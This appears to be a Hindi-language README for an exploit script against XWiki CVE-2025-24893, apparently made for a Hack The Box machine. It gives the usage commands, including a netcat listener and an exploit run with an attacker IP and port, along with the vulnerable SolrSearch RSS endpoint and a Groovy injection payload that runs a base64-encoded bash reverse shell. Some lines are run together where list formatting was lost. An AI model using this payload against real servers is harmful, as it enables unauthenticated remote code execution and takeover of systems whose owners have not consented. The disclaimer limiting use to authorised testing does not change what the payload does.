
XWiki CVE-2025-24893 के लिए Groovy स्क्रिप्ट इंजेक्शन के माध्यम से बिना प्रमाणीकरण वाला RCE एक्सप्लॉइट
CVE-2025-24893 के लिए संवेदनशील XWiki संस्करणों के लिए बिना प्रमाणीकरण के रिमोट कोड निष्पादन एक्सप्लॉइट।
15.10.9 से पहले के XWiki संस्करण SolrSearch RSS फ़ीड हैंडलर में Groovy स्क्रिप्ट इंजेक्शन के माध्यम से बिना प्रमाणीकरण के RCE के लिए संवेदनशील हैं। यह भेद्यता इसलिए मौजूद है क्योंकि XWiki text पैरामीटर में उपयोगकर्ता इनपुट को ठीक से सैनिटाइज़ करने में विफल रहता है, जिससे हमलावर RSS संदर्भ से बाहर निकलकर मनमाना Groovy कोड इंजेक्ट कर सकते हैं।
CVE आईडी: CVE-2025-24893
CVSS स्कोर: 9.8 (क्रिटिकल)
प्रभावित संस्करण: XWiki < 15.10.9
requests लाइब्रेरी)pip3 install requests
python3 exploit.py <target_url> <attacker_ip> <listener_port>
उदाहरण:
# Start listener on attacker machine
nc -lvnp 9001
# Run exploit
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001
}}}}}}{{{{groovy}}}}) का उपयोग करके इसे Groovy कोड में लपेटता है/xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload> पर GET अनुरोध भेजता हैएक्सप्लॉइट निम्नलिखित एंडपॉइंट को लक्षित करता है:
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
यह भेद्यता RSS फ़ीड संदर्भ से बाहर निकलने की अनुमति देती है:
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}
यह टूल केवल शैक्षिक और अधिकृत पैठ परीक्षण (penetration testing) उद्देश्यों के लिए है। लेखक इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है। इस एक्सप्लॉइट का उपयोग केवल उन्हीं सिस्टमों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।
MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें
HTB बॉक्स "Editor" के लिए बनाया गया
नोट: किसी भी सिस्टम का परीक्षण करने से पहले हमेशा सुनिश्चित करें कि आपके पास उचित अधिकार है।